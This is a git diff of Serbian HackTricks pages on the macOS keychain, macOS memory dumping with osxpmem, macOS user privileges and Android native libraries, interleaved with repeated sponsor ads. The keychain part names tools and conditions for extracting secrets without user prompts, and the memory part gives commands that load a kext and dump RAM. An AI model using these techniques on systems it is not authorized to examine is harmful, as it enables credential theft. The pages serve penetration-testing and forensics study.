* **Ključnik korisnika** (`~/Library/Keychains/login.keycahin-db`), koji se koristi za čuvanje **specifičnih za korisnika kredencijala** poput lozinki aplikacija, internet lozinki, korisničkih generisanih sertifikata, mrežnih lozinki i korisničkih generisanih javnih/privatnih ključeva.
|
||||
* **Sistemski Keychain** (`/Library/Keychains/System.keychain`), koji čuva **sistemski kredencijali** kao što su WiFi lozinke, sistemski root sertifikati, sistemski privatni ključevi i sistemski lozinke aplikacija.
|
||||
* **Sistemski Keychain** (`/Library/Keychains/System.keychain`), koji čuva **sistemski kredencijale** kao što su WiFi lozinke, sistemski root sertifikati, sistemski privatni ključevi i lozinke aplikacija sistema.
|
||||
|
||||
### Pristup Lozinki Keychain-a
|
||||
|
||||
Ovi fajlovi, iako nemaju inherentnu zaštitu i mogu biti **preuzeti**, su enkriptovani i zahtevaju **korisničku plaintext lozinku za dešifrovanje**. Alat poput [**Chainbreaker**](https://github.com/n0fate/chainbreaker) može se koristiti za dešifrovanje.
|
||||
Ovi fajlovi, iako nemaju urođenu zaštitu i mogu biti **preuzeti**, su enkriptovani i zahtevaju **korisničku plaintext lozinku za dešifrovanje**. Alat poput [**Chainbreaker**](https://github.com/n0fate/chainbreaker) može se koristiti za dešifrovanje.
|
||||
|
||||
## Zaštita Unosa u Keychain-u
|
||||
|
||||
### ACL-ovi
|
||||
|
||||
Svaki unos u keychain-u upravlja se **Access Control Listama (ACL-ovima)** koji određuju ko može izvršiti različite akcije na unosu u keychain-u, uključujući:
|
||||
Svaki unos u keychain-u upravlja se **Access Control Listama (ACL-ovima)** koji određuju ko može izvršiti različite akcije na unosu keychain-a, uključujući:
|
||||
|
||||
* **ACLAuhtorizationExportClear**: Dozvoljava nosiocu da dobije čisti tekst tajne.
|
||||
* **ACLAuhtorizationExportWrapped**: Dozvoljava nosiocu da dobije šifrovan čisti tekst sa drugom pruženom lozinkom.
|
||||
|
@ -51,11 +51,11 @@ ACL-ovi su dodatno praćeni **listom pouzdanih aplikacija** koje mogu izvršiti
|
|||
|
||||
*  **N`il`** (nije potrebna autorizacija, **svi su pouzdani**)
|
||||
* Prazna lista (**niko nije pouzdan**)
|
||||
* **Lista** specifičnih **aplikacija**.
|
||||
* Lista specifičnih **aplikacija**.
|
||||
|
||||
Takođe, unos može sadržati ključ **`ACLAuthorizationPartitionID`,** koji se koristi za identifikaciju **teamid, apple,** i **cdhash.**
|
||||
|
||||
* Ako je **teamid** naveden, tada da bi se **pristupio vrednosti unosa** bez **upita** korišćena aplikacija mora imati **isti teamid**.
|
||||
* Ako je naveden **teamid**, tada da bi se **pristupio vrednosti unosa** bez **upozorenja**, korišćena aplikacija mora imati **isti teamid**.
|
||||
* Ako je naveden **apple**, tada aplikacija mora biti **potpisana** od strane **Apple-a**.
|
||||
* Ako je naveden **cdhash**, tada aplikacija mora imati specifičan **cdhash**.
|
||||
|
||||
|
@ -93,41 +93,41 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
### API-ji
|
||||
|
||||
{% hint style="success" %}
|
||||
**Enumeracija i iskopavanje** tajni **keychain-a** koje **neće generisati upitnik** mogu se obaviti pomoću alata [**LockSmith**](https://github.com/its-a-feature/LockSmith)
|
||||
**Enumeracija i iskopavanje** tajni u **ključnom lancu** koje **neće generisati upit** mogu se obaviti pomoću alata [**LockSmith**](https://github.com/its-a-feature/LockSmith)
|
||||
{% endhint %}
|
||||
|
||||
Lista i dobijanje **informacija** o svakom unosu u keychain:
|
||||
Lista i dobijanje **informacija** o svakom unosu u ključnom lancu:
|
||||
|
||||
* API **`SecItemCopyMatching`** daje informacije o svakom unosu i postoje neki atributi koje možete postaviti prilikom korišćenja:
|
||||
* **`kSecReturnData`**: Ako je tačno, pokušaće da dešifruje podatke (postavite na lažno da biste izbegli potencijalne iskačuće prozore)
|
||||
* **`kSecReturnRef`**: Dobijanje reference na stavku u keychain-u (postavite na tačno u slučaju da kasnije vidite da možete dešifrovati bez iskačućeg prozora)
|
||||
* **`kSecReturnAttributes`**: Dobijanje metapodataka o unosima
|
||||
* **`kSecReturnRef`**: Dobijte i referencu na stavku u ključnom lancu (postavite na tačno u slučaju da kasnije vidite da možete dešifrovati bez iskačućeg prozora)
|
||||
* **`kSecReturnAttributes`**: Dobijte metapodatke o unosima
|
||||
* **`kSecMatchLimit`**: Koliko rezultata vratiti
|
||||
* **`kSecClass`**: Kakav je unos u keychain-u
|
||||
* **`kSecClass`**: Kakav je unos u ključnom lancu
|
||||
|
||||
Dobijanje **ACL-ova** svakog unosa:
|
||||
|
||||
* Pomoću API-ja **`SecAccessCopyACLList`** možete dobiti **ACL za stavku u keychain-u**, i vratiće listu ACL-ova (kao što su `ACLAuhtorizationExportClear` i ostali prethodno pomenuti) gde svaka lista ima:
|
||||
* Pomoću API-ja **`SecAccessCopyACLList`** možete dobiti **ACL za stavku u ključnom lancu**, i vratiće listu ACL-ova (kao što su `ACLAuhtorizationExportClear` i ostali prethodno pomenuti) gde svaka lista ima:
|
||||
* Opis
|
||||
* **Lista pouzdanih aplikacija**. Ovo može biti:
|
||||
* Aplikacija: /Applications/Slack.app
|
||||
* Binarna datoteka: /usr/libexec/airportd
|
||||
* Binarni fajl: /usr/libexec/airportd
|
||||
* Grupa: group://AirPort
|
||||
|
||||
Izvoz podataka:
|
||||
|
||||
* API **`SecKeychainItemCopyContent`** dobija tekstualne podatke
|
||||
* API **`SecItemExport`** izvozi ključeve i sertifikate ali može biti potrebno postaviti lozinke za izvoz šifrovanih sadržaja
|
||||
* API **`SecItemExport`** izvozi ključeve i sertifikate ali možda morate postaviti lozinke da biste izvezli sadržaj šifrovan
|
||||
|
||||
I ovo su **zahtevi** da biste mogli **izvesti tajnu bez upitnika**:
|
||||
I ovo su **zahtevi** da biste mogli **izvesti tajnu bez upita**:
|
||||
|
||||
* Ako je **1+ pouzdanih** aplikacija navedeno:
|
||||
* Potrebne su odgovarajuće **autorizacije** (**`Nil`**, ili biti **deo** dozvoljene liste aplikacija u autorizaciji za pristup tajnim informacijama)
|
||||
* Potrebno je da potpis koda odgovara **PartitionID**
|
||||
* Potrebno je da potpis koda odgovara onom od jedne **pouzdane aplikacije** (ili biti član odgovarajuće KeychainAccessGroup)
|
||||
* Potrebno je da se potpis koda poklapa sa **PartitionID**
|
||||
* Potrebno je da se potpis koda poklapa sa potpisom jedne **pouzdane aplikacije** (ili biti član odgovarajuće KeychainAccessGroup)
|
||||
* Ako su **sve aplikacije pouzdane**:
|
||||
* Potrebne su odgovarajuće **autorizacije**
|
||||
* Potrebno je da potpis koda odgovara **PartitionID**
|
||||
* Potrebno je da se potpis koda poklapa sa **PartitionID**
|
||||
* Ako nema **PartitionID**, onda ovo nije potrebno
|
||||
|
||||
{% hint style="danger" %}
|
||||
|
@ -138,7 +138,7 @@ Ako je **apple** naznačen u **partitionID**, možete pristupiti tome pomoću **
|
|||
|
||||
### Dva dodatna atributa
|
||||
|
||||
* **Nevidljivo**: To je boolean oznaka za **sakrivanje** unosa iz **UI** Keychain aplikacije
|
||||
* **Nevidljivo**: To je boolean zastava za **sakrivanje** unosa iz **UI** Keychain aplikacije
|
||||
* **Opšte**: Služi za čuvanje **metapodataka** (tako da NIJE ŠIFROVANO)
|
||||
* Microsoft je čuvao sve osvežene tokene za pristup osetljivim krajnjim tačkama u običnom tekstu.
|
||||
|
||||
|
@ -146,13 +146,13 @@ Ako je **apple** naznačen u **partitionID**, možete pristupiti tome pomoću **
|
|||
|
||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici kompromitovani od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici bili **napadnuti** od strane **malvera koji krade podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
|
||||
|
@ -164,10 +164,10 @@ Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplat
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,15 +14,15 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -36,21 +36,21 @@ Fajlovi zamene, poput `/private/var/vm/swapfile0`, služe kao **keš kada je fiz
|
|||
|
||||
### Hibernate slika
|
||||
|
||||
Fajl lociran na `/private/var/vm/sleepimage` je ključan tokom **hibernacionog režima**. **Podaci iz memorije se čuvaju u ovom fajlu kada OS X hibernira**. Po buđenju računara, sistem povlači podatke iz memorije iz ovog fajla, omogućavajući korisniku da nastavi gde je stao.
|
||||
Fajl koji se nalazi na lokaciji `/private/var/vm/sleepimage` je ključan tokom **hibernacionog režima**. **Podaci iz memorije se čuvaju u ovom fajlu kada OS X hibernira**. Po buđenju računara, sistem povlači podatke iz memorije iz ovog fajla, omogućavajući korisniku da nastavi gde je stao.
|
||||
|
||||
Važno je napomenuti da je na modernim MacOS sistemima ovaj fajl obično enkriptovan iz sigurnosnih razloga, što otežava oporavak.
|
||||
|
||||
* Da biste proverili da li je enkripcija omogućena za sleepimage, može se pokrenuti komanda `sysctl vm.swapusage`. Ovo će pokazati da li je fajl enkriptovan.
|
||||
* Da biste proverili da li je enkripcija omogućena za sleepimage, možete pokrenuti komandu `sysctl vm.swapusage`. Ovo će pokazati da li je fajl enkriptovan.
|
||||
|
||||
### Logovi pritiska na memoriju
|
||||
|
||||
Još jedan važan fajl povezan sa memorijom na MacOS sistemima su **logovi pritiska na memoriju**. Ovi logovi se nalaze u `/var/log` i sadrže detaljne informacije o korišćenju memorije sistema i događajima pritiska na memoriju. Mogu biti posebno korisni za dijagnostikovanje problema povezanih sa memorijom ili razumevanje kako sistem upravlja memorijom tokom vremena.
|
||||
Još jedan važan fajl povezan sa memorijom u MacOS sistemima su **logovi pritiska na memoriju**. Ovi logovi se nalaze u `/var/log` i sadrže detaljne informacije o korišćenju memorije sistema i događajima pritiska na memoriju. Mogu biti posebno korisni za dijagnostikovanje problema povezanih sa memorijom ili razumevanje kako sistem upravlja memorijom tokom vremena.
|
||||
|
||||
## Dumpovanje memorije sa osxpmem
|
||||
|
||||
Da biste dumpovali memoriju na MacOS mašini, možete koristiti [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
|
||||
Da biste dumpovali memoriju na MacOS mašini možete koristiti [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
|
||||
|
||||
**Napomena**: Sledeće instrukcije će raditi samo za Mac računare sa Intel arhitekturom. Ovaj alat je sada arhiviran, a poslednje izdanje je bilo 2017. Binarni fajl preuzet korišćenjem instrukcija ispod cilja Intel čipove jer Apple Silicon nije postojao 2017. Možda je moguće kompajlirati binarni fajl za arm64 arhitekturu, ali ćete morati sami da probate.
|
||||
**Napomena**: Sledeće instrukcije će raditi samo za Mac računare sa Intel arhitekturom. Ovaj alat je sada arhiviran, a poslednje izdanje je bilo 2017. Binarni fajl preuzet korišćenjem instrukcija ispod cilja Intel čipove jer Apple Silicon nije postojao 2017. Možda je moguće kompajlirati binarni fajl za arm64 arhitekturu, ali to ćete morati sami da probate.
|
||||
```bash
|
||||
#Dump raw format
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
|
@ -65,9 +65,9 @@ sudo kextutil "/tmp/MacPmem.kext"
|
|||
#Allow the kext in "Security & Privacy --> General"
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
```
|
||||
**Drugi problemi** mogu biti rešeni **omogućavanjem učitavanja kext-a** u "Sigurnost i privatnost --> Opšte", jednostavno ga **omogućite**.
|
||||
**Drugi problemi** mogu biti rešeni **omogućavanjem učitavanja kext-a** u "Bezbednost i privatnost --> Opšte", jednostavno ga **omogućite**.
|
||||
|
||||
Takođe možete koristiti ovaj **jednolinijski** kod za preuzimanje aplikacije, učitavanje kext-a i ispraznjenje memorije:
|
||||
Takođe možete koristiti ovaj **oneliner** da preuzmete aplikaciju, učitate kext i izvršite dump memorije:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -76,15 +76,15 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokrenut na **dark webu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji kradu informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -94,9 +94,9 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera koji krade informacije**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -44,26 +44,26 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* **Niko**: Procesi se izvršavaju sa ovim korisnikom kada su minimalne dozvole potrebne
|
||||
* **Niko**: Procesi se izvršavaju sa ovim korisnikom kada su potrebne minimalne dozvole
|
||||
* **Root**
|
||||
|
||||
### Korisničke privilegije
|
||||
### Privilegije Korisnika
|
||||
|
||||
* **Standardni korisnik**: Najosnovniji korisnik. Ovaj korisnik treba dozvole koje mu dodeljuje admin korisnik kada pokušava da instalira softver ili obavi druge napredne zadatke. Ne može to samostalno uraditi.
|
||||
* **Admin korisnik**: Korisnik koji većinu vremena funkcioniše kao standardni korisnik, ali mu je takođe dozvoljeno da obavlja radnje root korisnika, kao što je instalacija softvera i druge administrativne zadatke. Svi korisnici koji pripadaju admin grupi **dobijaju pristup root korisniku putem sudoers fajla**.
|
||||
* **Root**: Root je korisnik koji je dozvoljen da obavlja skoro svaku radnju (postoje ograničenja nametnuta zaštitom poput Sistemskog Integriteta).
|
||||
* **Standardni Korisnik**: Najosnovniji korisnik. Ovaj korisnik treba dozvole koje mu dodeljuje admin korisnik kada pokušava da instalira softver ili obavi druge napredne zadatke. Nije u mogućnosti da to uradi samostalno.
|
||||
* **Admin Korisnik**: Korisnik koji većinu vremena funkcioniše kao standardni korisnik, ali mu je takođe dozvoljeno da obavlja root akcije kao što je instalacija softvera i druge administrativne zadatke. Svi korisnici koji pripadaju admin grupi **dobijaju pristup root-u putem sudoers fajla**.
|
||||
* **Root**: Root je korisnik koji je dozvoljen da obavlja skoro svaku akciju (postoje ograničenja nametnuta zaštitom poput Sistemskog Integriteta).
|
||||
* Na primer, root neće moći da postavi fajl unutar `/System`
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
Drugi načini da podržite HackTricks:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,23 +6,23 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com)
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,30 +30,30 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
**Za dodatne informacije pogledajte: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
||||
|
||||
Android aplikacije mogu koristiti nativne biblioteke, obično napisane u C ili C++, za zadatke koji zahtevaju visoke performanse. Kreatori malvera takođe koriste ove biblioteke, jer su teže za reverzno inženjerstvo od DEX bajtkoda. Ova sekcija naglašava veštine reverznog inženjeringa prilagođene Androidu, umesto učenja jezika asemblerskog jezika. Verzije ARM i x86 biblioteka obezbeđene su radi kompatibilnosti.
|
||||
Android aplikacije mogu koristiti nativne biblioteke, obično napisane u C ili C++, za zadatke koji zahtevaju visoke performanse. Kreatori malvera takođe koriste ove biblioteke, jer su teže za reverzno inženjerstvo od DEX bajtkoda. Ova sekcija naglašava veštine reverznog inženjeringa prilagođene Androidu, umesto učenja jezika asemblerskog programiranja. Verzije biblioteka za ARM i x86 su obezbeđene radi kompatibilnosti.
|
||||
|
||||
### Ključne tačke:
|
||||
- **Nativne biblioteke u Android aplikacijama:**
|
||||
- Koriste se za zadatke koji zahtevaju visoke performanse.
|
||||
- Napisane su u C ili C++, što čini reverzno inženjerstvo izazovnim.
|
||||
- Pronalaze se u formatu `.so` (deljene objekte), slično Linux binarnim datotekama.
|
||||
- Pronalaze se u formatu `.so` (deljene objekte), slično Linux binarnim fajlovima.
|
||||
- Kreatori malvera preferiraju nativni kod kako bi analiza bila teža.
|
||||
|
||||
- **Java Native Interface (JNI) & Android NDK:**
|
||||
- JNI omogućava da se Java metode implementiraju u nativnom kodu.
|
||||
- JNI omogućava implementaciju Java metoda u nativnom kodu.
|
||||
- NDK je Android-specifičan set alata za pisanje nativnog koda.
|
||||
- JNI i NDK povezuju Java (ili Kotlin) kod sa nativnim bibliotekama.
